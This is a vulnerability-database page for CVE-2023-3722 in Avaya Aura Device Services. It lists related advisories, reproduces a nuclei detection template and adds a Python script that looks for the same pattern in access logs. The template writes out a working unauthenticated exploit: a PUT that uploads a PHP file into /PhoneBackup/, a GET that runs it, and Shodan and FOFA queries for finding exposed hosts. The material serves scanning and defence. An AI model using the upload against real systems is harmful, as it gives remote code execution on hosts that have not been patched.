Avaya Aura Device Services - OS Command Injection

01 Jul 2026 03:36:47 | Reported by ProjectDiscovery | Type: nuclei | Source: github.com

High severity OS command injection in Avaya Aura Device Services allows remote code execution.

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| GithubExploit | Exploit for Unrestricted Upload of File with Dangerous Type in Avaya Aura_Device_Services | 19 Nov 2024 19:40 | githubexploit |
| Circl | CVE-2023-3722 | 19 Nov 2024 19:43 | circl |
| CNNVD | Avaya Aura Device Services code issue vulnerability | 19 Jul 2023 00:00 | cnnvd |
| CVE | CVE-2023-3722 | 19 Jul 2023 19:56 | cve |
| Cvelist | CVE-2023-3722 Avaya Aura Device Services Remote Code Execution | 19 Jul 2023 19:56 | cvelist |
| NCSC | Vulnerability fixed in Avaya Aura | 20 Jul 2023 00:00 | ncsc |
| NVD | CVE-2023-3722 | 19 Jul 2023 20:15 | nvd |
| OSV | CVE-2023-3722 | 19 Jul 2023 20:15 | osv |
| Prion | Command injection | 19 Jul 2023 20:15 | prion |
| Positive Technologies | PT-2023-25838 · Avaya · Avaya Aura Device Services | 19 Jul 2023 00:00 | ptsecurity |

id: CVE-2023-3722

info:
  name: Avaya Aura Device Services - OS Command Injection
  author: iamnoooob,pdresearch
  severity: high
  description: |
    An OS command injection vulnerability was found in the Avaya Aura Device Services Web application which could allow remote code execution as the Web server user via a malicious uploaded file. This issue affects Avaya Aura Device Services version 8.1.4.0 and earlier.
  impact: |
    Unauthenticated attackers can upload malicious PHP files to execute arbitrary code with web server privileges on Avaya Aura Device Services, potentially compromising VoIP infrastructure and accessing telecommunications data.
  remediation: |
    Update Avaya Aura Device Services to a version newer than 8.1.4.0 that validates uploaded files and restricts code execution in the PhoneBackup directory.
  reference:
    - https://github.com/pizza-power/CVE-2023-3722
    - https://download.avaya.com/css/public/documents/101076366
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H
    cvss-score: 8.6
    cve-id: CVE-2023-3722
    cwe-id: CWE-434
    epss-score: 0.03334
    epss-percentile: 0.87111
    cpe: cpe:2.3:a:avaya:aura_device_services:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: avaya
    product: aura_device_services
    shodan-query: html:"Avaya Aura® Utility Services"
    fofa-query: body="Avaya Aura® Utility Services"
  tags: cve,cve2023,avaya,rce,upload,deviceservices,intrusive,vkev,vuln

variables:
  filename: "{{randbase(8)}}"
  marker: "{{randstr}}"

http:
  - raw:
      - |
        PUT /PhoneBackup/{{filename}}.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: AVAYA

        <?phP echo base64_decode($_GET['input']); ?>

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 201'
          - 'contains(body, "Resource /PhoneBackup/{{filename}}.php has been created.")'
        condition: and
        internal: true

  - raw:
      - |
        GET /PhoneBackup/{{filename}}.php?input={{base64(marker)}} HTTP/1.1
        Host: {{Hostname}}
        User-Agent: AVAYA

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "{{marker}}")'
        condition: and
# digest: 490a0046304402203e808762c23e6d46f9242d3a9ea810d9827e0c8d68e563fea8055a7cb0d99e47022017d30d18e706d950c994ad9e3469710c67c0d244b0ed5397089baa401b60dea9:922c64590222798bb761d5b6d8e72950
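
A defender-side check for the request pair this template sends, added here as an example (it is not part of the template or of ProjectDiscovery's code): it scans web server access logs for PUT requests that create a .php file under /PhoneBackup/ and for later successful fetches of that file. The combined log format, the function name and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Assumed combined-log-format fields: client, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# Script files in the backup directory; extension matched case-insensitively.
SCRIPT_RE = re.compile(r'^/PhoneBackup/[^/]+\.php$', re.IGNORECASE)

# Constructed sample log lines (documentation IP ranges, invented file names).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2025:10:00:00 +0000] "PUT /PhoneBackup/AbCdEfGh.php HTTP/1.1" 201 70 "-" "AVAYA"',
    '192.0.2.10 - - [01/Jan/2025:10:00:01 +0000] "GET /PhoneBackup/AbCdEfGh.php?input=dGVzdA== HTTP/1.1" 200 4 "-" "AVAYA"',
    '198.51.100.7 - - [01/Jan/2025:11:00:00 +0000] "PUT /PhoneBackup/blocked.PHP HTTP/1.1" 403 199 "-" "curl/8.0"',
    '198.51.100.8 - - [01/Jan/2025:12:00:00 +0000] "PUT /PhoneBackup/phone_0001.cfg HTTP/1.1" 201 70 "-" "AVAYA"',
]

def find_phonebackup_uploads(lines):
    """Return one finding per script PUT into /PhoneBackup/, recording whether
    the upload succeeded (201) and which clients later fetched it (200)."""
    findings = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line in the assumed format
        path = urlsplit(m["target"]).path  # drop the query string
        if not SCRIPT_RE.match(path):
            continue
        status = int(m["status"])
        if m["method"] == "PUT":
            f = findings.setdefault(path, {"path": path, "uploader": m["ip"],
                                           "created": False, "executed_by": []})
            f["created"] = f["created"] or status == 201
        elif m["method"] == "GET" and status == 200 and path in findings:
            findings[path]["executed_by"].append(m["ip"])
    return list(findings.values())

if __name__ == "__main__":
    for finding in find_phonebackup_uploads(SAMPLE_LOG):
        print(finding)
```

A finding with `created` true and a non-empty `executed_by` means the uploaded script was served back with a 200; a finding with `created` false records a rejected attempt that is still worth reviewing.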

04 Feb 2026 07:00 (Current)
Vulners AI Score: 7.8 (High risk)
CVSS 3.1: 8.6 - 9.8
EPSS: 0.03334